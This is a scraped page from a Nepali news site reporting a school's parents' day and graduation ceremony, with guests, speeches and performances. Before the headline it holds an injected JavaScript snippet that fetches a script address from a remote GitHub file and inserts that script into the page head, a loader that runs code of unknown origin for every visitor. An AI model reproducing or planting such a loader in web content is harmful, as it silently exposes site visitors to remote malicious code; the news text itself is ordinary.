;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); शुभकामना स्कूलको अभिभावक दिवस भव्य रूपमा सम्पन्न, खुसि व्यक्त गर्दै अध्यक्ष प्रकाश अधिकारी – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • शुभकामना स्कूलको अभिभावक दिवस भव्य रूपमा सम्पन्न, खुसि व्यक्त गर्दै अध्यक्ष प्रकाश अधिकारी
Breaking News

शुभकामना स्कूलको अभिभावक दिवस भव्य रूपमा सम्पन्न, खुसि व्यक्त गर्दै अध्यक्ष प्रकाश अधिकारी

जुनेली न्युज काठमाडौँ ,
गोकर्णेश्वर नगरपालिका वडा नं ४ मा अबस्थित शुभकामना स्कूलले अभिभावक दिवस तथा दिक्षान्त समारोह भव्य रूपमा सम्पन्न गरेको छ। समारोहका प्रमुख अतिथि गोकर्णेश्वर नगरपालिकाका मेयर दीपक कुमार रिसाल रहनुभएको थियो। कार्यक्रममा गोकर्णेश्वर नगरपालिकाका उप–मेयर  सन्नानी लामा, वडा नं. ४ का वडा अध्यक्ष श्री जयराम महत, शिक्षा प्रमुख श्री बीर बहादुर खड्का, तथा East Pole School and College का अध्यक्ष एवं प्रख्यात शिक्षाविद इश्वेर प्रसाद सापकोटा विशेष अतिथिका रूपमा उपस्थित हुनुहुन्थ्यो।
कार्यक्रममा मोटिभेटर श्री ईश्वर श्रेष्ठले आफ्नो प्रेरणादायी प्रस्तुति राख्नुभएको थियो, जसले उपस्थित विद्यार्थी, अभिभावक, र अतिथिहरूलाई नयाँ उर्जा प्रदान गर्यो। साथै, संगीत, नृत्य, तेक्वान्दो, तथा शिक्षकहरूको विशेष नृत्य प्रस्तुति कार्यक्रममा विशेष आकर्षण बने। विद्यार्थीहरूका विविध प्रस्तुतिहरूले समारोहलाई थप उत्साहपूर्ण बनाएको थियो।
विद्यालय व्यवस्थापन समितिले उपस्थित सम्पूर्ण अतिथि, अभिभावक, विद्यार्थी, शिक्षक तथा शिक्षकेत्तर कर्मचारीहरूलाई कार्यक्रमलाई भव्य रूपमा सफल पार्न दिनुभएको अमूल्य सहयोग र साथका लागि विशेष धन्यवाद व्यक्त गरेको छ।
विद्यालयका प्रतिनिधिहरूका अनुसार, शुभकामना स्कूल आगामी दिनमा पनि यस्ता शैक्षिक, सांस्कृतिक तथा प्रेरणादायी कार्यक्रमहरूलाई निरन्तरता दिने प्रतिबद्धतासहित अगाडि बढ्नेछ।

फेसबुक प्रतिक्रियाहरु